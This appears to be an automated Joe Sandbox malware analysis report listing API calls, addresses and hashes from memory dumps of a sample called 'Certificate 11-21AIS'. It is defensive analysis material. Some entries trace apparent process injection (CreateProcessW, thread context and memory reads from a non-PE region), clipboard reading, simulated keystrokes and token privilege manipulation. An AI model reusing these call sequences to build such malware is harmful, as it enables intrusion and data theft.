                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                              • String ID:
                                                                              • API String ID: 924797094-0
                                                                              APIs
                                                                              • ___lock_fhandle.LIBCMT ref: 008EEA29
                                                                              • __close_nolock.LIBCMT ref: 008EEA42
                                                                                • Part of subcall function 008E7BDA: __getptd_noexit.LIBCMT ref: 008E7BDA
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                              • String ID:
                                                                              • API String ID: 1046115767-0
                                                                              APIs
                                                                                • Part of subcall function 008E395C: __FF_MSGBANNER.LIBCMT ref: 008E3973
                                                                                • Part of subcall function 008E395C: __NMSG_WRITE.LIBCMT ref: 008E397A
                                                                                • Part of subcall function 008E395C: RtlAllocateHeap.NTDLL(00FA0000,00000000,00000001,00000001,00000000,?,?,008DF507,?,0000000E), ref: 008E399F
                                                                              • std::exception::exception.LIBCMT ref: 008DF51E
                                                                              • __CxxThrowException@8.LIBCMT ref: 008DF533
                                                                                • Part of subcall function 008E6805: RaiseException.KERNEL32(?,?,0000000E,00976A30,?,?,?,008DF538,0000000E,00976A30,?,00000001), ref: 008E6856
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 3902256705-0
                                                                              APIs
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              • __lock_file.LIBCMT ref: 008E3629
                                                                                • Part of subcall function 008E4E1C: __lock.LIBCMT ref: 008E4E3F
                                                                              • __fclose_nolock.LIBCMT ref: 008E3634
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2800547568-0
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 011B46DB
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011B4771
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011B4793
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              APIs
                                                                              • __flush.LIBCMT ref: 008E2A0B
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __flush__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 4101623367-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
APIs
  • Part of subcall function 008C4214: FreeLibrary.KERNEL32(00000000,?), ref: 008C4247
• LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008C39FE,?,00000001), ref: 008C41DB
  • Part of subcall function 008C4291: FreeLibrary.KERNEL32(00000000), ref: 008C42C4
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Library$Free$Load
• String ID:
• API String ID: 2391024519-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
• ___lock_fhandle.LIBCMT ref: 008EAFC0
  • Part of subcall function 008E7BDA: __getptd_noexit.LIBCMT ref: 008E7BDA
  • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: __getptd_noexit$___lock_fhandle
• String ID:
• API String ID: 1144279405-0
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
APIs
• __lock_file.LIBCMT ref: 008E2AED
  • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
APIs
• FreeLibrary.KERNEL32(?,?,?,?,?,008C39FE,?,00000001), ref: 008C4286
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008C40C6
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: LongNamePath
• String ID:
• API String ID: 82841172-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 011B4F31
Memory Dump Source
• Source File: 00000000.00000002.1696607130.00000000011B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B2000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_11b2000_Certificate 11-21AIS.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
  • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0092F87D
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0092F8DC
• GetWindowLongW.USER32(?,000000F0), ref: 0092F919
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0092F940
• SendMessageW.USER32 ref: 0092F966
• _wcsncpy.LIBCMT ref: 0092F9D2
• GetKeyState.USER32(00000011), ref: 0092F9F3
• GetKeyState.USER32(00000009), ref: 0092FA00
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0092FA16
• GetKeyState.USER32(00000010), ref: 0092FA20
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0092FA4F
• SendMessageW.USER32 ref: 0092FA72
• SendMessageW.USER32(?,00001030,?,0092E059), ref: 0092FB6F
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0092FB85
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0092FB96
• SetCapture.USER32(?), ref: 0092FB9F
• ClientToScreen.USER32(?,?), ref: 0092FC03
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0092FC0F
• InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0092FC29
• ReleaseCapture.USER32 ref: 0092FC34
• GetCursorPos.USER32(?), ref: 0092FC69
• ScreenToClient.USER32(?,?), ref: 0092FC76
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0092FCD8
• SendMessageW.USER32 ref: 0092FD02
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0092FD41
• SendMessageW.USER32 ref: 0092FD6C
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0092FD84
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 0092FD8F
• GetCursorPos.USER32(?), ref: 0092FDB0
• ScreenToClient.USER32(?,?), ref: 0092FDBD
• GetParent.USER32(?), ref: 0092FDD9
• SendMessageW.USER32(?,00001012,00000000,?), ref: 0092FE3F
• SendMessageW.USER32 ref: 0092FE6F
• ClientToScreen.USER32(?,?), ref: 0092FEC5
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0092FEF1
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0092FF19
• SendMessageW.USER32 ref: 0092FF3C
• ClientToScreen.USER32(?,?), ref: 0092FF86
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0092FFB6
• GetWindowLongW.USER32(?,000000F0), ref: 0093004B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F
• API String ID: 2516578528-4164748364
APIs
• SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0092B1CD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
• Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
Similarity
• API ID: MessageSend
• String ID: %d/%02d/%02d
• API String ID: 3850602802-328681919
APIs
• GetForegroundWindow.USER32(00000000,00000000), ref: 008DEB4A
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00933AEA
• IsIconic.USER32(000000FF), ref: 00933AF3
• ShowWindow.USER32(000000FF,00000009), ref: 00933B00
• SetForegroundWindow.USER32(000000FF), ref: 00933B0A
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00933B20
• GetCurrentThreadId.KERNEL32 ref: 00933B27
• GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00933B33
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00933B44
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00933B4C
• AttachThreadInput.USER32(00000000,?,00000001), ref: 00933B54
• SetForegroundWindow.USER32(000000FF), ref: 00933B57
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00933B6C
• keybd_event.USER32(00000012,00000000), ref: 00933B77
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00933B81
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00933B86
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00933B8F
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00933B94
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00933B9E
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00933BA3
                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00933BA6
                                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00933BCD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 4125248594-2988720461
                                                                              • Opcode ID: 91dcc6f98a01aa05e49793c8766c84e5a7c468831006a72bcca3ccf82538aa86
                                                                              • Instruction ID: 42dae789794e35c68cdd8203d16ce65589c6d80c4ca80b462fac37fabf9878f0
                                                                              • Opcode Fuzzy Hash: 91dcc6f98a01aa05e49793c8766c84e5a7c468831006a72bcca3ccf82538aa86
                                                                              • Instruction Fuzzy Hash: 6C319479A94218BBEB206B659C49F7F7E7CEB45B50F118015FA05EA1D0DAB05D00AEA0
                                                                              APIs
                                                                                • Part of subcall function 008FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008FB180
                                                                                • Part of subcall function 008FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008FB1AD
                                                                                • Part of subcall function 008FB134: GetLastError.KERNEL32 ref: 008FB1BA
                                                                              • _memset.LIBCMT ref: 008FAD08
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008FAD5A
                                                                              • CloseHandle.KERNEL32(?), ref: 008FAD6B
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008FAD82
                                                                              • GetProcessWindowStation.USER32 ref: 008FAD9B
                                                                              • SetProcessWindowStation.USER32(00000000), ref: 008FADA5
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 008FADBF
                                                                                • Part of subcall function 008FAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008FACC0), ref: 008FAB99
                                                                                • Part of subcall function 008FAB84: CloseHandle.KERNEL32(?,?,008FACC0), ref: 008FABAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 2063423040-1027155976
                                                                              • Opcode ID: 14d90b36cd0b836e3dd80c38e98431a504c19f7437c6a2fbf22f939714d9e245
                                                                              • Instruction ID: 1ed74c277e47476aefe21935f8fa69460c32e31fabaa7d7d23830a1dbfd6e9be
                                                                              • Opcode Fuzzy Hash: 14d90b36cd0b836e3dd80c38e98431a504c19f7437c6a2fbf22f939714d9e245
                                                                              • Instruction Fuzzy Hash: 438178B590124DAFDF159FA4CC48ABE7BB8FF09328F044119FA18E6161DB318E549B62
                                                                              APIs
                                                                                • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00905FA6,?), ref: 00906ED8
                                                                                • Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00905FA6,?), ref: 00906EF1
                                                                                • Part of subcall function 0090725E: __wsplitpath.LIBCMT ref: 0090727B
                                                                                • Part of subcall function 0090725E: __wsplitpath.LIBCMT ref: 0090728E
                                                                                • Part of subcall function 009072CB: GetFileAttributesW.KERNEL32(?,00906019), ref: 009072CC
                                                                              • _wcscat.LIBCMT ref: 00906149
                                                                              • _wcscat.LIBCMT ref: 00906167
                                                                              • __wsplitpath.LIBCMT ref: 0090618E
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 009061A4
                                                                              • _wcscpy.LIBCMT ref: 00906209
                                                                              • _wcscat.LIBCMT ref: 0090621C
                                                                              • _wcscat.LIBCMT ref: 0090622F
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0090625D
                                                                              • DeleteFileW.KERNEL32(?), ref: 0090626E
                                                                              • MoveFileW.KERNEL32(?,?), ref: 00906289
                                                                              • MoveFileW.KERNEL32(?,?), ref: 00906298
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 009062AD
                                                                              • DeleteFileW.KERNEL32(?), ref: 009062BE
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 009062E1
                                                                              • FindClose.KERNEL32(00000000), ref: 009062FD
                                                                              • FindClose.KERNEL32(00000000), ref: 0090630B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 1917200108-1173974218
                                                                              • Opcode ID: 2e9ddf0ab0da4fa2a195dcf7bd17411f60acbfbaaf93765e883d954382b48f75
                                                                              • Instruction ID: 42d056a01f74b427371b484ee00ad21dacb76dd8e424097bcf299def20d0f31b
                                                                              • Opcode Fuzzy Hash: 2e9ddf0ab0da4fa2a195dcf7bd17411f60acbfbaaf93765e883d954382b48f75
                                                                              • Instruction Fuzzy Hash: A6515E7680811CAECB21EB95CC44DEFB7BCAF05300F0504EAE595E2141DB76A7898FA4
                                                                              APIs
                                                                              • OpenClipboard.USER32(0095DC00), ref: 00916B36
                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00916B44
                                                                              • GetClipboardData.USER32(0000000D), ref: 00916B4C
                                                                              • CloseClipboard.USER32 ref: 00916B58
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00916B74
                                                                              • CloseClipboard.USER32 ref: 00916B7E
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00916B93
                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00916BA0
                                                                              • GetClipboardData.USER32(00000001), ref: 00916BA8
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00916BB5
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00916BE9
                                                                              • CloseClipboard.USER32 ref: 00916CF6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
